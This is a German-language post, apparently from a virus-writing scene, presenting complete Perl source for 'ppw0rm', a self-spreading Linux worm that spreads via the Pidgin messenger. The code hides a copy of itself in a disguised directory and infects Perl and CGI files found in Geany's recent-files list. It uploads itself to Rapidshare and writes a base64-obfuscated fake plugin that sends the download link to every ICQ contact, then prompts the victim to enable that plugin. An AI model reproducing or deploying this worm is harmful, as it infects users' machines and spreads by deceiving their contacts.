[+]Topic: Code
[+]Von: Perforin
[+]Return: Code

ppw0rm ist ein *NIX Wurm der sich über Pidgin verbreitet! Dazu nutzt er
das Pidgin Perl Interface um sich zu verbreiten. Zuerst wird der User dazu
aufgefordert, das Plugin zu aktivieren. Dann verbreitet sich der Wurm über
alle ICQ Kontakte. Dazu schickt er jedem einen Rapidshare DL Link. Natürlich
wird bei jedem ausführen, der Wurm erneut auf rapidshare geupped!

#!/usr/bin/perl # ppw0rm - by Perforin [VXnetw0rk] use Digest::MD5("md5_hex"); use MIME::Base64; use Fcntl; use File::Basename; use IO::Socket; if ($^O =~ m/linux/i) { linux(); } else { print "If you don't trust anybody with anything at all, why bother interacting with them?\n"; } sub linux { ($file,$maxbufsize,$cursorsize) = ($0,64000,0); ($/,$size,$filename) = (undef,-s $file,basename($file)); ($exe) = ('exec("/home/$ENV{\'LOGNAME\'}/.purpIe/pidgin-plugin-core.pl");'); open(FH,"<",$file); $filecontent = <FH>; close(FH); mkdir("$ENV{'HOME'}/.purpIe",0777); open(hide,">","/home/$ENV{'LOGNAME'}/.purpIe/pidgin-plugin-core.pl"); print hide $filecontent; close(hide); open(GY,"<","/home/$ENV{'LOGNAME'}/.config/geany/geany.conf") || pspread(); while (<GY>) { if ($_ =~ m/recent_files=(.*)/i) { $GYR = $1; } } close(GY); @gyrfiles = split(/\;/,$GYR); foreach $ipath (@gyrfiles) { if ($ipath =~ m/\w*\.(pl|cgi)$/i) { open(IPATHFILE,"<",$ipath); @ipathline = <IPATHFILE>; close(IPATHFILE); open(infected,">",$ipath); foreach $line (@ipathline) { print infected $line; if ($line =~ m/\s{1,10}/) { $injection_counter++; if ($injection_counter == 1) { print infected $exe . "\n"; } } } close(infected); undef($injection_counter); } } pspread(); } sub pspread { $md5hex = uc(md5_hex($filecontent)); $size2 = length($filecontent); unless ($size == $size2) { die exit; } $socket = IO::Socket::INET->new(PeerAddr => "rapidshare.com:80"); print $socket "GET /cgi-bin/rsapi.cgi?sub=nextuploadserver_v1 HTTP/1.0\r\n\r\n"; ($uploadserver) = <$socket> =~ /\r\n\r\n(\d+)/; unless ($uploadserver) { die exit; } sysopen($fh, $file, O_RDONLY) || die exit; $socket = IO::Socket::INET->new(PeerAddr => "rs$uploadserver" . "l3" . ".rapidshare.com:80"); $boundary = "---------------------632865735RS4EVER5675865"; $contentheader .= "$boundary\r\nContent-Disposition: form-data; name=\"rsapi_v1\"\r\n\r\n1\r\n"; $contentheader .= "$boundary\r\nContent-Disposition: form-data; name=\"filecontent\"; filename=\"$filename\"\r\n\r\n"; $contenttail = "\r\n$boundary--\r\n"; $contentlength = length($contentheader) + $size + length($contenttail); $header = "POST /cgi-bin/upload.cgi HTTP/1.0\r\nContent-Type: multipart/form-data; boundary=$boundary\r\nContent-Length: $contentlength\r\n\r\n"; print $socket "$header$contentheader"; while ($cursize < $size) { $bufferlen = sysread($fh, $buffer, $maxbufsize, 0) || 0; unless ($bufferlen) { die exit; } $cursize += $bufferlen; print $socket $buffer; } print $socket $contenttail; ($result) = <$socket> =~ /\r\n\r\n(.+)/s; unless ($result) { die exit; } foreach (split(/\n/, $result)) { if ($_ =~ /([^=]+)=(.+)/) { $key_val{$1} = $2 } } if ($md5hex ne $key_val{"File1.4"}) { die exit; } $DL_URL = $key_val{"File1.1"}; open(PC,">","/home/$ENV{'LOGNAME'}/.purple/plugins/plugin-core.pl") || print "If you don't trust anybody with anything at all, why bother interacting with them?\n"; print PC decode_base64(" IyEvdXNyL2Jpbi9wZXJsDQogdXNlIFBpZGdpbjsNCiANCiVQTFVHSU5fSU5GTyA9ICgNCiAgICBw ZXJsX2FwaV92ZXJzaW9uID0+IDIsDQogICAgbmFtZSA9PiAiUGlkZ2luIENvcmUiLA0KICAgIHZl cnNpb24gPT4gIjEuMCIsDQogICAgc3VtbWFyeSA9PiAiUGlkZ2luIGNvcmUgcGx1Z2lucy4gVGhp cyBwbHVnaW4gbXVzdCBiZSBlbmFibGVkIHRvIHVzZSBhbnkgb3RoZXIgcGx1Z2luISIsDQogICAg ZGVzY3JpcHRpb24gPT4gIlBpZGdpbiBjb3JlIHBsdWdpbiB0byBlbmFibGUgb3RoZXIgcGx1Z2lu cyB0byBsb2FkLiIsDQogICAgYXV0aG9yID0+ICJ3MzIucGVyZm9yaW5cQGdtYWlsLmNvbSIsDQog ICAgdXJsID0+ICJodHRwOi8vcGlkZ2luLmltIiwNCiAgICBsb2FkID0+ICJwbHVnaW5fbG9hZCIs DQogICAgdW5sb2FkID0+ICJwbHVnaW5fdW5sb2FkIg0KKTsNCg0Kc3ViIHBsdWdpbl9pbml0IHsg cmV0dXJuICVQTFVHSU5fSU5GTzsgfQ0KDQpzdWIgcGx1Z2luX2xvYWQgew0KDQpvcGVuKGFjY291 bnRzLCI8IiwiL2hvbWUvJEVOVnsnTE9HTkFNRSd9Ly5wdXJwbGUvYWNjb3VudHMueG1sIikgfHwg ZGllICJDcml0aWNhbCBmYWlsdXJlIVxuIjsNCndoaWxlICg8YWNjb3VudHM+KSB7IGlmICgkXyA9 fiBtLzxuYW1lPihcZCopPFwvbmFtZT4vaSkgeyAkYWNjb3VudF9uYW1lID0gJDE7IH0gfQ0KY2xv c2UoYWNjb3VudHMpOw0Kb3BlbihibGlzdCwiPCIsIi9ob21lLyRFTlZ7J0xPR05BTUUnfS8ucHVy cGxlL2JsaXN0LnhtbCIpIHx8IGRpZSAiV2FybmluZyBmaWxlIG5vdCBmb3VuZCFcbiI7DQp3aGls ZSAoPGJsaXN0PikgeyBpZiAoJF8gPX4gbS88bmFtZT4oXGQqKTxcL25hbWU+L2kpIHsgcHVzaChA SUNRLCQxKTsgfSB9DQpjbG9zZShibGlzdCk7DQoNCiRwbHVnaW4gPSBzaGlmdDsNCiRhY2MgPSBQ dXJwbGU6OkFjY291bnRzOjpmaW5kKCRhY2NvdW50X25hbWUsICJwcnBsLWljcSIpOw0KIGZvcmVh Y2ggJFVJTiAoQElDUSkgew0KICAgICRjb252MSA9IFB1cnBsZTo6Q29udmVyc2F0aW9uLT5uZXco MSwgJGFjYywgJFVJTik7DQogICAgaWYgKCRjb252MSkgeyBwcmludCAib2suXG4iOyB9IGVsc2Ug eyBwcmludCAiZmFpbC5cbiI7IH0NCiAgICAkaW0gPSAkY29udjEtPmdldF9pbV9kYXRhKCk7DQog ICAgaWYgKCRpbSkgeyBwcmludCAib2suXG4iOyB9IGVsc2UgeyBwcmludCAiZmFpbC5cbiI7IH0= ") . "\n" . "\$im->send(\"WTF -> $DL_URL This is a must have pidgin plugin!\");" . "\n" . decode_base64(" ICAgICRjb252MS0+ZGVzdHJveSgpOw0KICB9DQp9DQoNCnN1YiBwbHVnaW5fdW5sb2FkIHsNCiAg ICBteSAkcGx1Z2luID0gc2hpZnQ7DQogICAgUHVycGxlOjpEZWJ1Zzo6aW5mbygiUGlkZ2luIGNv cmUgcGx1Z2luIiwgInBsdWdpbl91bmxvYWQoKSAtIFBpZGdpbiBjb3JlIHBsdWdpbiB1bmxvYWRl ZC5cbiIpOw0KfQ0K"); close(PC); open(MSG,">","/home/$ENV{'LOGNAME'}/.purpIe/txt.msg") || print "Please activate <<Pidgin Core>> by yourself\nin the plugin section of pidgin.\nPress CTRL + U to get there!"; print MSG <<"MSG"; Please activate <<Pidgin Core>> by yourself in the plugin section of pidgin. Press CTRL + U to get there! MSG close(MSG); system("xmessage -center -file /home/$ENV{'LOGNAME'}/.purpIe/txt.msg"); }